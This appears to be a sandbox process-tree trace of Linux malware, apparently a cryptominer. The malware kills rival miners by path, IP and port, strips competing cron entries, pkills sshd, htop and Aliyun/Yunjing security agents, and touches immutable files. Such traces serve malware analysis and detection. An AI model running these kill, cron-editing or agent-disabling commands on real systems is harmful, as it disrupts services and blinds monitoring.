/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1348
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1353
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1358
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1363
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1368
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1373
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1378
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1383
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1388
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1393
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1398
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1403
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1408
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1416
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1421
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1426
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1431
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1436
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1441
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1446
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1451
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1456
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1461
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1466
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1471
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1476
-
-
/bin/grepgrep -v grep2⤵PID:1479
-
-
/bin/grepgrep /dot2⤵PID:1478
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1480
-
-
/bin/psps aux2⤵PID:1477
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1481
-
-
/usr/bin/pkillpkill -f hezb2⤵PID:1482
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1487
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1486
-
-
/bin/grepgrep -v grep2⤵PID:1485
-
-
/bin/grepgrep tracepath2⤵PID:1484
-
-
/bin/psps aux2⤵PID:1483
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵PID:1488
-
-
/bin/grepgrep -v grep2⤵PID:1491
-
-
/bin/grepgrep ./ll12⤵PID:1490
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1492
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1493
-
-
/bin/psps aux2⤵PID:1489
-
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
PID:1495
-
-
/bin/psps aux2⤵PID:1494
-
-
/bin/grepgrep -i "[y]unjing"2⤵PID:1497
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1496
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1502
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1501
-
-
/bin/grepgrep -v grep2⤵PID:1500
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1499
-
-
/bin/psps aux2⤵PID:1498
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1507
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1506
-
-
/bin/grepgrep -v grep2⤵PID:1505
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1504
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1503
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1512
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1511
-
-
/bin/grepgrep -v grep2⤵PID:1510
-
-
/bin/grepgrep "bash -k"2⤵PID:1509
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1508
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1517
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1516
-
-
/bin/grepgrep -v grep2⤵PID:1515
-
-
/bin/grepgrep perfctl2⤵PID:1514
-
-
/bin/psps aux2⤵PID:1513
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1520
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1521
-
-
/bin/grepgrep 185.71.65.2382⤵PID:1519
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1522
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1527
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1526
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1525
-
-
/bin/grepgrep 140.82.52.872⤵PID:1524
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1533
-
-
/bin/grepgrep -v -2⤵PID:1532
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1531
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1530
-
-
/bin/grepgrep 207.38.87.62⤵PID:1529
-
-
/bin/grepgrep -v -2⤵PID:1538
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1539
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1537
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1536
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1535
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1542
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1541
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1543
-
-
/bin/grepgrep -v -2⤵PID:1544
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1545
-
-
/bin/grepgrep -v -2⤵PID:1550
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1551
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1549
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1548
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1547
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵PID:1552
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1557
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1556
-
-
/bin/grepgrep -v grep2⤵PID:1555
-
-
/bin/grepgrep agetty2⤵PID:1554
-
-
/bin/psps aux2⤵PID:1553
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵PID:1558
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1561
-
-
/bin/sedsed /192.81.212.13/d2⤵PID:1560
-
-
/usr/bin/crontabcrontab -l2⤵PID:1559
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1564
-
-
/bin/sedsed /base64/d2⤵PID:1563
-
-
/usr/bin/crontabcrontab -l2⤵PID:1562
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1567
-
-
/bin/sedsed /python/d2⤵PID:1566
-
-
/usr/bin/crontabcrontab -l2⤵PID:1565
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1570
-
-
/bin/sedsed /shm/d2⤵PID:1569
-
-
/usr/bin/crontabcrontab -l2⤵PID:1568
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1573
-
-
/bin/sedsed /postgresql/d2⤵PID:1572
-
-
/usr/bin/crontabcrontab -l2⤵PID:1571
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1576
-
-
/bin/sedsed /cloudfronts/d2⤵PID:1575
-
-
/usr/bin/crontabcrontab -l2⤵PID:1574
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1579
-
-
/bin/sedsed /sshd/d2⤵PID:1578
-
-
/usr/bin/crontabcrontab -l2⤵PID:1577
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1582
-
-
/bin/sedsed /linux/d2⤵PID:1581
-
-
/usr/bin/crontabcrontab -l2⤵PID:1580
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1585
-
-
/bin/sedsed /neoogilvy/d2⤵PID:1584
-
-
/usr/bin/crontabcrontab -l2⤵PID:1583
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1588
-
-
/bin/sedsed /rsync/d2⤵PID:1587
-
-
/usr/bin/crontabcrontab -l2⤵PID:1586
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1591
-
-
/bin/sedsed /bpdeliver/d2⤵PID:1590
-
-
/usr/bin/crontabcrontab -l2⤵PID:1589
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1594
-
-
/bin/sedsed /perfcc/d2⤵PID:1593
-
-
/usr/bin/crontabcrontab -l2⤵PID:1592
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
PID:1595
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1596
-
-
/usr/bin/pkillpkill -f linuxsys2⤵PID:1598
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
PID:1599
-
-
/usr/bin/pkillpkill -f donkey2⤵PID:1600
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
PID:1601
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
PID:1602
-
-
/usr/bin/pkillpkill -f update-setup2⤵PID:1603
-
-
/bin/grepgrep -v -2⤵PID:1608
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1607
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1609
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1606
-
-
/bin/grepgrep :14142⤵PID:1605
-
-
/bin/grepgrep -v -2⤵PID:1614
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1615
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1613
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1612
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1611
-
-
/bin/grepgrep -v -2⤵PID:1620
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1619
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1621
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1618
-
-
/bin/grepgrep :1432⤵PID:1617
-
-
/bin/grepgrep -v -2⤵PID:1626
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1627
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1625
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1624
-
-
/bin/grepgrep :22222⤵PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1633
-
-
/bin/grepgrep -v -2⤵PID:1632
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1631
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1630
-
-
/bin/grepgrep :33332⤵PID:1629
-
-
/bin/grepgrep -v -2⤵PID:1638
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1639
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1637
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1636
-
-
/bin/grepgrep :33892⤵PID:1635
-
-
/bin/grepgrep -v -2⤵PID:1644
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1645
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1643
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1642
-
-
/bin/grepgrep :44442⤵PID:1641
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1651
-
-
/bin/grepgrep -v -2⤵PID:1650
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1649
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1648
-
-
